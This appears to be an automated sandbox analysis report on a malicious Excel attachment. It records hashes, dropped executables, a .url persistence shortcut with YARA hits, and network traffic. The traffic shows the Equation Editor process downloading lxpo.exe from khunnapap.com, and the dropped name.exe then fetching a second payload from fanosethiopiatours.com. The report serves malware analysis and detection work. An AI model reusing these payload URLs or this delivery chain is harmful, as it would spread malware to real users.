                              SHA-512:4D435EE7CA5A983B628294815BB64B5B58ABBED67724DA35BC5AD3CF88CC337375D529DB1882D27C20599413D566BFA841B9275833A2C925C72669CBBC8BE14F
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              IE Cache URL:http://khunnapap.com/inc/lxpo.exe
                                                                      Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................V....................@..............................................@...........................P...$...0...|...........D...T......4...................................................................................CODE................................ ..`DATA.....!......."..................@...BSS.....5....0...........................idata...$...P...&..................@....tls....@............6...................rdata...............6..............@..P.reloc..4............8..............@..P.rsrc....|...0...|..................@..P.....................B..............@..P........................................................................................................................................
                              C:\Users\user\AppData\Local\afqH.url
                              Process:C:\Users\Public\name.exe
                              File Type:MS Windows 95 Internet shortcut text (URL=<file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Hqfadrv.exe>), ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):169
                              Entropy (8bit):5.174497935559406
                              Encrypted:false
                              SSDEEP:3:HRAbABGQYmHmEX+6JwGcVh4EkD5oef5yaKCNvQJ5ontCBuXV9k/qIH19Yxv:HRYFVmc6JDkhJkDlR9LNvQJ5OtZF9k/4
                              MD5:E158D6BAC2A5E2BCE21FAF2926136AE6
                              SHA1:C70B6E338982DDF42FAC251F3F31CEEE33E34A8C
                              SHA-256:4370DD4369B4854100575123C2842EC7571A1D066A6EF30A0121286DAE68E6FB
                              SHA-512:D6CD09C6007E889AECC643FB4D531D2B98969A05E3BEBC1C4F6ECD740F13F32520C975DA02239F08BF2B93C98271C630043371312FBC7199D63C8AECB3D9CA8D
                              Malicious:false
                              Yara Hits:
                              • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\afqH.url, Author: @itsreallynick (Nick Carr)
                              • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\afqH.url, Author: @itsreallynick (Nick Carr)
                              • Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\afqH.url, Author: @itsreallynick (Nick Carr)
                              Reputation:low
                              Preview: [InternetShortcut]..URL=file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Hqfadrv.exe..IconIndex=1..IconFile=.url..Modified=20F06BA06D07BD014D..HotKey=1601..
                                                                      C:\Users\user\Desktop\~$SpecificationX20202611.xlsx
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):165
                                                                      Entropy (8bit):1.4377382811115937
                                                                      Encrypted:false
                                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                      Malicious:true
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      C:\Users\Public\name.exe
                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1218752
                                                                      Entropy (8bit):7.109875910384301
                                                                      Encrypted:false
                                                                      SSDEEP:24576:3RVtvQ+csIDccuZGhe1ppCmfwybRk8zQKtALblKCeNRbO+v:3R/ovVcOM1pJwYrzQ0t
                                                                      MD5:45E25807FC1BD31A0B8309C44AFCE6E4
                                                                      SHA1:F070047F9DF99461C951F3973E3BF3E468A96A31
                                                                      SHA-256:344CA08FA2FDB87931CEB1E336019231BFBA189458BE0D3FA5016B5895D96CC6
                                                                      SHA-512:4D435EE7CA5A983B628294815BB64B5B58ABBED67724DA35BC5AD3CF88CC337375D529DB1882D27C20599413D566BFA841B9275833A2C925C72669CBBC8BE14F
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Reputation:low
                                                                      Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................V....................@..............................................@...........................P...$...0...|...........D...T......4...................................................................................CODE................................ ..`DATA.....!......."..................@...BSS.....5....0...........................idata...$...P...&..................@....tls....@............6...................rdata...............6..............@..P.reloc..4............8..............@..P.rsrc....|...0...|..................@..P.....................B..............@..P........................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:Microsoft Excel 2007+
                                                                      Entropy (8bit):7.998421974370225
                                                                      TrID:
                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                      • ZIP compressed archive (8000/1) 16.67%
                                                                      File name:SpecificationX20202611.xlsx
                                                                      File size:144657
                                                                      MD5:8bbf38221e93da549de22199cafb1ece
                                                                      SHA1:4d650073a4fd46217e891c94d6eca54644addfb6
                                                                      SHA256:1cea11e60bce272e08ef8906924229cc33ba41dc2903ca2c397eb0ca70d85196
                                                                      SHA512:2c57986b3a939e3f7e197cf043ec20e6edb7c0b4d5eb43420070faee69e9fe6cda8549b76a2abe8b012fa60523bef13f35df0bc290bfd235914f55b9a0b392dd
                                                                      SSDEEP:3072:WvZR/rQhV8Nr0Ehm5Rv9Nq4DJgje7kyF4Hgp+C30lUjC:QDMGmEh0R1Nq+g6F4+0OjC
                                                                      File Content Preview:PK.........UsQ....t...Y.......[Content_Types].xmlUT....L._.L._.L._...n.0.E.................T..N<!.~.c^..I.H.xUa.+..{....F.....T.f...X..pR.y.>go.'.`.V..,dl..F....l...R[.X..........y..S.`D..0.^..1....=....6vc....1.b.c.....L.hd....feLx.U!".....(.=!%e........

                                                                      File Icon

                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                      Static OLE Info

                                                                      General

                                                                      Document Type:OpenXML
                                                                      Number of OLE Files:1

                                                                      OLE File "/opt/package/joesandbox/database/analysis/323613/sample/SpecificationX20202611.xlsx"

                                                                      Indicators

                                                                      Has Summary Info:False
                                                                      Application Name:unknown
                                                                      Encrypted Document:False
                                                                      Contains Word Document Stream:
                                                                      Contains Workbook/Book Stream:
                                                                      Contains PowerPoint Document Stream:
                                                                      Contains Visio Document Stream:
                                                                      Contains ObjectPool Stream:
                                                                      Flash Objects Count:
                                                                      Contains VBA Macros:False

                                                                      Summary

                                                                      Author:User PC
                                                                      Last Saved By:User PC
                                                                      Create Time:2020-11-17T05:15:13Z
                                                                      Last Saved Time:2020-11-17T05:15:37Z
                                                                      Creating Application:Microsoft Excel
                                                                      Security:0

                                                                      Document Summary

                                                                      Thumbnail Scaling Desired:false
                                                                      Company:
                                                                      Contains Dirty Links:false
                                                                      Shared Document:false
                                                                      Changed Hyperlinks:false
                                                                      Application Version:15.0300

                                                                      Streams

                                                                      Stream Path: \x1OlE10NatiVE, File Type: data, Stream Size: 136853
                                                                      General
                                                                      Stream Path:\x1OlE10NatiVE
                                                                      File Type:data
                                                                      Stream Size:136853
                                                                      Entropy:7.99580138608
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . T . . . . . . . . | . m P . 3 . . . . . . . . . . o F . . . P . . . . . . . \\ . t u . . . . . B . k . o ] . v 4 . . . . . . . . m . . W . . . . { . . 9 . . . . . 7 . . . . . . C . . 8 . @ . . . i ? . g . P [ : ` . . . . . . . ' L . . X B . . f . . . . . Y . . . . ' x . . < . . . . . O . . . 7 6 J T . . ) . . . . . O . . . . . s t . . ' 7 _ b % w U . . . . ' 5 _ . . . . ` . . c P S 5 Z / . . < + . . . ( D . . 5 . F . 7 . . W . M . . . . . g . . . . . d . } . . . . 7 . . f . . . .
                                                                      Data Raw:f7 f5 f9 05 02 ac a0 80 f9 0d 01 08 54 bf bb be bd c7 a9 81 e3 7c bf 6d 50 8b 33 8b 06 bf fa f7 de 04 81 e7 b1 6f 46 b2 8b 0f 50 ff d1 05 20 fc 8d 8a 05 5c 14 74 75 ff e0 d6 d7 b0 42 00 6b c6 6f 5d b6 76 34 96 b7 d2 eb d1 ed f7 aa 6d dd b1 57 8d 81 a8 f7 7b ec 9e 39 93 96 95 b8 19 37 2e 08 0d 95 8c 12 43 1b 1a 38 df 40 05 d6 0a 69 3f 0a 67 ee 50 5b 3a 60 f5 c7 a0 ba 9a b0 ef 27 4c

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      Timestamp                  Protocol  SID        Message                                  Source Port  Dest Port  Source IP       Dest IP
                                                                      11/27/20-08:27:06.195246   TCP       100000132  COMMUNITY WEB-MISC Proxy Server Access   80           49165      128.199.253.44  192.168.2.22

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      Timestamp                            Source Port  Dest Port  Source IP       Dest IP
                                                                      Nov 27, 2020 08:27:03.892057896 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.176641941 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.176758051 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.177026033 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.461309910 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480389118 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480454922 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480487108 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480504990 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480504990 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480545044 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480555058 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480602980 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480602980 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480643034 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480654955 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480698109 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480705023 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480745077 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480753899 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480802059 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480803013 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480844975 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480850935 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480894089 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.491564989 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765470028 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765556097 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765614986 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765672922 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765702963 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765722036 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765732050 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765733957 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765769958 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765788078 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765841007 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765842915 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765888929 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765898943 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765955925 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765959024 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766019106 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766037941 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766073942 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766077042 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766109943 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766129971 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766184092 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766185045 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766241074 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766243935 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766295910 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766298056 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766352892 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766355038 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766407967 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766410112 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766464949 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766464949 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766520977 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766526937 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766566992 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766571999 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766623020 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:04.771090984 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051208973 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051291943 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051320076 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051347971 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051395893 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051404953 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051419020 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051676035 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051733017 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051739931 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051755905 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051783085 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051819086 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051834106 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051875114 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051882982 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051894903 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051932096 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051934958 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051980972 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051995993 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052030087 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.052043915 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052079916 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.052090883 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052129030 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.052141905 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052176952 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.052186966 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052227974 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.052236080 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052277088 CET  80           49165      128.199.253.44  192.168.2.22
                                                                      Nov 27, 2020 08:27:05.052285910 CET  49165        80         192.168.2.22    128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052325010 CET  80           49165      128.199.253.44  192.168.2.22

                                                                      UDP Packets

                                                                      Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                                                                      Nov 27, 2020 08:27:03.493489027 CET  52197        53         192.168.2.22  8.8.8.8
                                                                      Nov 27, 2020 08:27:03.839210033 CET  53           52197      8.8.8.8       192.168.2.22
                                                                      Nov 27, 2020 08:27:03.839448929 CET  52197        53         192.168.2.22  8.8.8.8
                                                                      Nov 27, 2020 08:27:03.874870062 CET  53           52197      8.8.8.8       192.168.2.22
                                                                      Nov 27, 2020 08:27:13.029138088 CET  53099        53         192.168.2.22  8.8.8.8
                                                                      Nov 27, 2020 08:27:13.056329966 CET  53           53099      8.8.8.8       192.168.2.22
                                                                      Nov 27, 2020 08:27:13.144454002 CET  52838        53         192.168.2.22  8.8.8.8
                                                                      Nov 27, 2020 08:27:13.315857887 CET  53           52838      8.8.8.8       192.168.2.22
                                                                      Nov 27, 2020 08:27:13.331212044 CET  61200        53         192.168.2.22  8.8.8.8
                                                                      Nov 27, 2020 08:27:13.366880894 CET  53           61200      8.8.8.8       192.168.2.22
                                                                      Nov 27, 2020 08:27:55.571918011 CET  49548        53         192.168.2.22  8.8.8.8
                                                                      Nov 27, 2020 08:27:55.599250078 CET  53           49548      8.8.8.8       192.168.2.22
                                                                      Nov 27, 2020 08:27:55.702537060 CET  55627        53         192.168.2.22  8.8.8.8
                                                                      Nov 27, 2020 08:27:55.737932920 CET  53           55627      8.8.8.8       192.168.2.22
                                                                      Nov 27, 2020 08:27:55.745898962 CET  56009        53         192.168.2.22  8.8.8.8
                                                                      Nov 27, 2020 08:27:55.925196886 CET  53           56009      8.8.8.8       192.168.2.22
                                                                      Nov 27, 2020 08:28:05.911607027 CET  61865        53         192.168.2.22  8.8.8.8
                                                                      Nov 27, 2020 08:28:05.938766956 CET  53           61865      8.8.8.8       192.168.2.22
                                                                      Nov 27, 2020 08:28:06.017550945 CET  55171        53         192.168.2.22  8.8.8.8
                                                                      Nov 27, 2020 08:28:06.185575962 CET  53           55171      8.8.8.8       192.168.2.22
                                                                      Nov 27, 2020 08:28:06.199385881 CET  52496        53         192.168.2.22  8.8.8.8
                                                                      Nov 27, 2020 08:28:06.235008955 CET  53           52496      8.8.8.8       192.168.2.22

                                                                      DNS Queries

                                                                      Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                    Type            Class
                                                                      Nov 27, 2020 08:27:03.493489027 CET  192.168.2.22  8.8.8.8  0xd92d    Standard query (0)  khunnapap.com           A (IP address)  IN (0x0001)
                                                                      Nov 27, 2020 08:27:03.839448929 CET  192.168.2.22  8.8.8.8  0xd92d    Standard query (0)  khunnapap.com           A (IP address)  IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.029138088 CET  192.168.2.22  8.8.8.8  0xafd     Standard query (0)  discord.com             A (IP address)  IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.144454002 CET  192.168.2.22  8.8.8.8  0x6222    Standard query (0)  fanosethiopiatours.com  A (IP address)  IN (0x0001)
                                                                      Nov 27, 2020 08:27:13.331212044 CET  192.168.2.22  8.8.8.8  0x4f7d    Standard query (0)  fanosethiopiatours.com  A (IP address)  IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.571918011 CET  192.168.2.22  8.8.8.8  0xc34c    Standard query (0)  discord.com             A (IP address)  IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.702537060 CET  192.168.2.22  8.8.8.8  0x696b    Standard query (0)  fanosethiopiatours.com  A (IP address)  IN (0x0001)
                                                                      Nov 27, 2020 08:27:55.745898962 CET  192.168.2.22  8.8.8.8  0x6c80    Standard query (0)  fanosethiopiatours.com  A (IP address)  IN (0x0001)
                                                                      Nov 27, 2020 08:28:05.911607027 CET  192.168.2.22  8.8.8.8  0xe5f5    Standard query (0)  discord.com             A (IP address)  IN (0x0001)
                                                                      Nov 27, 2020 08:28:06.017550945 CET  192.168.2.22  8.8.8.8  0x6290    Standard query (0)  fanosethiopiatours.com  A (IP address)  IN (0x0001)
                                                                      Nov 27, 2020 08:28:06.199385881 CET  192.168.2.22  8.8.8.8  0xab2c    Standard query (0)  fanosethiopiatours.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 27, 2020 08:27:03.839210033 CET | 8.8.8.8 | 192.168.2.22 | 0xd92d | No error (0) | khunnapap.com | | 128.199.253.44 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:03.874870062 CET | 8.8.8.8 | 192.168.2.22 | 0xd92d | No error (0) | khunnapap.com | | 128.199.253.44 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:13.056329966 CET | 8.8.8.8 | 192.168.2.22 | 0xafd | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:13.056329966 CET | 8.8.8.8 | 192.168.2.22 | 0xafd | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:13.056329966 CET | 8.8.8.8 | 192.168.2.22 | 0xafd | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:13.056329966 CET | 8.8.8.8 | 192.168.2.22 | 0xafd | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:13.056329966 CET | 8.8.8.8 | 192.168.2.22 | 0xafd | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:13.315857887 CET | 8.8.8.8 | 192.168.2.22 | 0x6222 | No error (0) | fanosethiopiatours.com | | 50.87.153.103 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:13.366880894 CET | 8.8.8.8 | 192.168.2.22 | 0x4f7d | No error (0) | fanosethiopiatours.com | | 50.87.153.103 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:55.599250078 CET | 8.8.8.8 | 192.168.2.22 | 0xc34c | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:55.599250078 CET | 8.8.8.8 | 192.168.2.22 | 0xc34c | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:55.599250078 CET | 8.8.8.8 | 192.168.2.22 | 0xc34c | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:55.599250078 CET | 8.8.8.8 | 192.168.2.22 | 0xc34c | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:55.599250078 CET | 8.8.8.8 | 192.168.2.22 | 0xc34c | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:55.737932920 CET | 8.8.8.8 | 192.168.2.22 | 0x696b | No error (0) | fanosethiopiatours.com | | 50.87.153.103 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:27:55.925196886 CET | 8.8.8.8 | 192.168.2.22 | 0x6c80 | No error (0) | fanosethiopiatours.com | | 50.87.153.103 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:28:05.938766956 CET | 8.8.8.8 | 192.168.2.22 | 0xe5f5 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:28:05.938766956 CET | 8.8.8.8 | 192.168.2.22 | 0xe5f5 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:28:05.938766956 CET | 8.8.8.8 | 192.168.2.22 | 0xe5f5 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:28:05.938766956 CET | 8.8.8.8 | 192.168.2.22 | 0xe5f5 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:28:05.938766956 CET | 8.8.8.8 | 192.168.2.22 | 0xe5f5 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:28:06.185575962 CET | 8.8.8.8 | 192.168.2.22 | 0x6290 | No error (0) | fanosethiopiatours.com | | 50.87.153.103 | A (IP address) | IN (0x0001)
Nov 27, 2020 08:28:06.235008955 CET | 8.8.8.8 | 192.168.2.22 | 0xab2c | No error (0) | fanosethiopiatours.com | | 50.87.153.103 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• khunnapap.com
• fanosethiopiatours.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 128.199.253.44 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Nov 27, 2020 08:27:04.177026033 CET | 0 | OUT | GET /inc/lxpo.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: khunnapap.com
    Connection: Keep-Alive
Nov 27, 2020 08:27:04.480389118 CET | 2 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 27 Nov 2020 07:27:03 GMT
    Content-Type: application/x-msdownload
    Content-Length: 1218752
    Last-Modified: Wed, 25 Nov 2020 04:41:22 GMT
    Connection: keep-alive
    ETag: "5fbde072-1298c0"
    Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49167 | 50.87.153.103 | 80 | C:\Users\Public\name.exe

Timestamp | kBytes transferred | Direction | Data
Nov 27, 2020 08:27:13.538929939 CET | 1293 | OUT | GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: fanosethiopiatours.com
Nov 27, 2020 08:27:13.717318058 CET | 1295 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Nov 2020 07:27:13 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Wed, 25 Nov 2020 04:37:45 GMT
    Accept-Ranges: bytes
    Content-Length: 967680
    Vary: User-Agent
    Keep-Alive: timeout=5, max=75


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 50.87.153.103 | 80 | C:\Users\Public\name.exe

Timestamp | kBytes transferred | Direction | Data
